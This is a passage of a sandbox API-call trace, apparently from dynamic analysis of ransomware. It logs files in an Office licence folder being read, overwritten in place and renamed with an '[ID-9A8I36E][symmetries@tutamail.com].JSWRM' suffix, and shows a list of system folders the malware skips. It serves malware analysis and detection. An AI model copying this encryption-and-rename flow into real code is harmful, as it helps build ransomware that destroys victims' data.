dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0104.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0104.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0104.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0104.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.270] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_kms_client-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_KMS_Client-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_kms_client-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0104.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0104.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0104.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0104.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0104.271] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe53ae71a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe53ae71a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5420d88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d59, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoVL_KMS_Client-ul-oob.xrm-ms", cAlternateFileName="MO445C~1.XRM")) returned 1 [0104.271] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.271] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.271] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.271] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.271] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.271] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.271] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.271] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.271] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.271] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0104.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0104.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0104.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0104.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d298, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0104.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0104.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0104.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0104.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_kms_client-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.272] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11609) returned 1 [0104.272] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0104.272] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0104.274] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.274] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0104.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.274] CloseHandle (hObject=0x45c) returned 1 [0104.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0104.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0104.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0104.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0104.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0104.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0104.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.275] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_kms_client-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_KMS_Client-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_kms_client-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0104.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0104.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0104.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.276] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe533c027, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe533c027, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe53d491f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2581, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoVL_KMS_Client-ul.xrm-ms", cAlternateFileName="MONDOV~4.XRM")) returned 1 [0104.276] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul.xrm-ms", lpString2=".") returned 1 [0104.276] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul.xrm-ms", lpString2="..") returned 1 [0104.276] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul.xrm-ms", lpString2="...") returned 1 [0104.276] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul.xrm-ms", lpString2="windows") returned -1 [0104.276] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul.xrm-ms", lpString2="recovery") returned -1 [0104.276] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul.xrm-ms", lpString2="perflogs") returned -1 [0104.276] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul.xrm-ms", lpString2="documents and settings") returned 1 [0104.276] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.276] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul.xrm-ms", lpString2="system volume information") returned -1 [0104.276] lstrcmpiW (lpString1="MondoVL_KMS_Client-ul.xrm-ms", lpString2="msocache") returned -1 [0104.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0104.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_KMS_Client-ul.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0104.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0104.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_KMS_Client-ul.xrm-ms", cchWideChar=28, lpMultiByteStr=0x240fc0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0104.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0104.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0104.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_KMS_Client-ul.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0104.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0104.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_KMS_Client-ul.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2411c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0104.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0104.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0104.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0104.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0104.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_kms_client-ul.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.277] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9601) returned 1 [0104.277] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2580) returned 0x24c1d0 [0104.277] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2580, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2580, lpOverlapped=0x0) returned 1 [0104.279] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.279] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2580, lpOverlapped=0x0) returned 1 [0104.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.279] CloseHandle (hObject=0x45c) returned 1 [0104.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0104.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0104.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0104.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0104.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0104.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0104.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.280] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_kms_client-ul.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_KMS_Client-ul.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_kms_client-ul.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0104.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0104.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0104.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0104.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0104.281] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe533c027, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe533c027, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5420d88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x297b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoVL_MAK-pl.xrm-ms", cAlternateFileName="MONDOV~3.XRM")) returned 1 [0104.281] lstrcmpiW (lpString1="MondoVL_MAK-pl.xrm-ms", lpString2=".") returned 1 [0104.281] lstrcmpiW (lpString1="MondoVL_MAK-pl.xrm-ms", lpString2="..") returned 1 [0104.281] lstrcmpiW (lpString1="MondoVL_MAK-pl.xrm-ms", lpString2="...") returned 1 [0104.281] lstrcmpiW (lpString1="MondoVL_MAK-pl.xrm-ms", lpString2="windows") returned -1 [0104.281] lstrcmpiW (lpString1="MondoVL_MAK-pl.xrm-ms", lpString2="recovery") returned -1 [0104.281] lstrcmpiW (lpString1="MondoVL_MAK-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.281] lstrcmpiW (lpString1="MondoVL_MAK-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.281] lstrcmpiW (lpString1="MondoVL_MAK-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.281] lstrcmpiW (lpString1="MondoVL_MAK-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.281] lstrcmpiW (lpString1="MondoVL_MAK-pl.xrm-ms", lpString2="msocache") returned -1 [0104.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_MAK-pl.xrm-ms", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0104.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0104.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_MAK-pl.xrm-ms", cchWideChar=21, lpMultiByteStr=0x240f98, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 21 [0104.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_MAK-pl.xrm-ms", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0104.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0104.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_MAK-pl.xrm-ms", cchWideChar=21, lpMultiByteStr=0x2413a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 21 [0104.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0104.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0104.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0104.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_mak-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.282] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10619) returned 1 [0104.282] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2970) returned 0x24c1d0 [0104.282] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2970, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2970, lpOverlapped=0x0) returned 1 [0104.290] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.290] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2970, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2970, lpOverlapped=0x0) returned 1 [0104.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.290] CloseHandle (hObject=0x45c) returned 1 [0104.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0104.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.290] RtlAllocateHeap 